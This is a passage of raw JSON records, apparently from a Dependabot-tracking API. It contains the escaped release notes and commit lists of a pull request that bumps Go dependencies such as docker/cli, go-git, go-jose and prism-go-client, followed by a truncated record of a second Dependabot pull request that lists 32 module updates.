view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.3+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/055a478ea9010a19d0d4674c0d0e87ade37a4223\"\u003e\u003ccode\u003e055a478\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6945\"\u003e#6945\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d0f5b279e9ead4cadc6f78a2ea0ff29f652f1c50\"\u003e\u003ccode\u003ed0f5b27\u003c/code\u003e\u003c/a\u003e cmd/docker-trust: bump moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/b7f37e86da572a12dcea84a2e08183132bf51e00\"\u003e\u003ccode\u003eb7f37e8\u003c/code\u003e\u003c/a\u003e vendor: github.com/moby/moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c93d892f0ea0145d9e6ab99bb4aae7dbcb389d61\"\u003e\u003ccode\u003ec93d892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6949\"\u003e#6949\u003c/a\u003e from thaJeztah/bump_utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/3553cafa13f691eb0a5a726f5457929c44fd55e7\"\u003e\u003ccode\u003e3553caf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6948\"\u003e#6948\u003c/a\u003e from thaJeztah/bump_trust_deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/266f039bb52fd237388f08e874aa719d6a6e9835\"\u003e\u003ccode\u003e266f039\u003c/code\u003e\u003c/a\u003e Dockerfile: update compose to v5.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d74d3c3b163abbb084d50676da34a0055d45b855\"\u003e\u003ccode\u003ed74d3c3\u003c/code\u003e\u003c/a\u003e Dockerfile: update buildx to v0.33.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/134c2a0ed627f03cc0e6d1806f96a0b68331dc50\"\u003e\u003ccode\u003e134c2a0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6826\"\u003e#6826\u003c/a\u003e from thaJeztah/bump_golangci_lint2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/58a7c3155b14d6696bb8cb2d7a77c48a555848c1\"\u003e\u003ccode\u003e58a7c31\u003c/code\u003e\u003c/a\u003e golangci-lint: fix lint failures from v2.10.1 upgrade\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f37a9e663fca9f351cdbe3e18353292125108285\"\u003e\u003ccode\u003ef37a9e6\u003c/code\u003e\u003c/a\u003e Dockerfile: update golangci-lint to v2.10.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bc930f4cbe095a3e1d49273655f73fcef7d41a42\"\u003e\u003ccode\u003ebc930f4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2065\"\u003e#2065\u003c/a\u003e from go-git/commit-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/d315264343cead712aa9eb56475c2ec96f5ecef1\"\u003e\u003ccode\u003ed315264\u003c/code\u003e\u003c/a\u003e plumbing: object, Reset object before decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/6e1d34890a4dae8a0df738e531234bd60b7e9b66\"\u003e\u003ccode\u003e6e1d348\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tree handling with upstream\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/e134ba34cf95ed0167e5b1df36a933d7bde9d02d\"\u003e\u003ccode\u003ee134ba3\u003c/code\u003e\u003c/a\u003e tests: Skip double checks in Git v2.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1971422f6b1bec9176061b3293306981cfff981e\"\u003e\u003ccode\u003e1971422\u003c/code\u003e\u003c/a\u003e tests: Add git conformance tests for signing verification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a387aa8857a8fbba8e74b7f5485e9e030669ab5d\"\u003e\u003ccode\u003ea387aa8\u003c/code\u003e\u003c/a\u003e plumbing: object, Add ErrMalformedTag\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f415670d906b5c6169d1fdc64f3f9f1d33eb6f9c\"\u003e\u003ccode\u003ef415670\u003c/code\u003e\u003c/a\u003e plumbing: object, Decode Tag headers via a state machine\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/5b0cd38a62e2336bb5f1a2ad0eb8ac8f9e7b740e\"\u003e\u003ccode\u003e5b0cd38\u003c/code\u003e\u003c/a\u003e plumbing: object, Reject multi-signature commits at Verify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fe8ed6223a6079d9fd84d853362a996e7df175fb\"\u003e\u003ccode\u003efe8ed62\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tag.EncodeWithoutSignature with Commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/98e337d5bdc4c0536a40ab7381b2231f7e0b15cd\"\u003e\u003ccode\u003e98e337d\u003c/code\u003e\u003c/a\u003e plumbing: object, Add support for Tag.SignatureSHA256\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: adding API calls for dataPolicy by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/340\"\u003enutanix-cloud-native/prism-go-client#340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/341\"\u003enutanix-cloud-native/prism-go-client#341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adds the Nutanix Insights REST client by \u003ca href=\"https://github.com/sauravknx\"\u003e\u003ccode\u003e@​sauravknx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/339\"\u003enutanix-cloud-native/prism-go-client#339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: split error handling into contract and v4 implementation by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/342\"\u003enutanix-cloud-native/prism-go-client#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add ListNicsByVmId to VMs service by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/352\"\u003enutanix-cloud-native/prism-go-client#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: Add UUID in the URL path for UpdateK8sRegistration by \u003ca href=\"https://github.com/priyadarshini7q\"\u003e\u003ccode\u003e@​priyadarshini7q\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/335\"\u003enutanix-cloud-native/prism-go-client#335\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs t...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10766","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10766","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10766/packages"},{"uuid":"4419601275","node_id":"PR_kwDOKp_HZs7aLzcB","number":252,"state":"open","title":"deps(deps): bump the gomod-minor-and-patch group across 1 directory with 32 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-11T09:22:08.000Z","updated_at":"2026-05-11T09:23:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(deps): bump","group_name":"gomod-minor-and-patch","update_count":32,"packages":[{"name":"cloud.google.com/go/storage","old_version":"1.49.0","new_version":"1.62.1","repository_url":"https://github.com/googleapis/google-cloud-go"},{"name":"github.com/MShekow/directory-checksum","old_version":"1.4.9","new_version":"1.4.18","repository_url":"https://github.com/MShekow/directory-checksum"},{"name":"github.com/atombender/go-jsonschema","old_version":"0.23.0","new_version":"0.23.1","repository_url":"https://github.com/atombender/go-jsonschema"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.47.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-secretsmanager-caching-go","old_version":"1.1.3","new_version":"1.2.0","repository_url":"https://github.com/aws/aws-secretsmanager-caching-go"},{"name":"github.com/cloudflare/cloudflare-go","old_version":"0.104.0","new_version":"0.116.0","repository_url":"https://github.com/cloudflare/cloudflare-go"},{"name":"github.com/disgoorg/disgo","old_version":"0.18.5","new_version":"0.19.3","repository_url":"https://github.com/disgoorg/disgo"},{"name":"github.com/fatih/color","old_version":"1.18.0","new_version":"1.19.0","repository_url":"https://github.com/fatih/color"},{"name":"github.com/go-git/go-billy/v5","old_version":"5.8.0","new_version":"5.9.0","repository_url":"https://github.com/go-git/go-billy"},{"name":"github.com/go-git/go-git/v5","old_version":"5.18.0","new_version":"5.19.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/otiai10/copy","old_version":"1.14.0","new_version":"1.14.1","repository_url":"https://github.com/otiai10/copy"},{"name":"github.com/pulumi/pulumi-aws/sdk/v6","old_version":"6.83.0","new_version":"6.83.3","repository_url":"https://github.com/pulumi/pulumi-aws"},{"name":"github.com/pulumi/pulumi-cloudflare/sdk/v6","old_version":"6.2.0","new_version":"6.15.0","repository_url":"https://github.com/pulumi/pulumi-cloudflare"},{"name":"github.com/pulumi/pulumi-docker/sdk/v4","old_version":"4.5.8","new_version":"4.11.2","repository_url":"https://github.com/pulumi/pulumi-docker"},{"name":"github.com/pulumi/pulumi-gcp/sdk/v8","old_version":"8.0.0","new_version":"8.41.1","repository_url":"https://github.com/pulumi/pulumi-gcp"},{"name":"github.com/pulumi/pulumi-kubernetes/sdk/v4","old_version":"4.18.1","new_version":"4.30.0","repository_url":"https://github.com/pulumi/pulumi-kubernetes"},{"name":"github.com/pulumi/pulumi-mongodbatlas/sdk/v3","old_version":"3.30.0","new_version":"3.38.0","repository_url":"https://github.com/pulumi/pulumi-mongodbatlas"},{"name":"github.com/pulumi/pulumi-random/sdk/v4","old_version":"4.17.0","new_version":"4.19.2","repository_url":"https://github.com/pulumi/pulumi-random"},{"name":"github.com/pulumi/pulumi/pkg/v3","old_version":"3.184.0","new_version":"3.237.0","repository_url":"https://github.com/pulumi/pulumi"},{"name":"github.com/samber/lo","old_version":"1.38.1","new_version":"1.53.0","repository_url":"https://github.com/samber/lo"},{"name":"github.com/tmc/langchaingo","old_version":"0.1.13","new_version":"0.1.14","repository_url":"https://github.com/tmc/langchaingo"},{"name":"go.m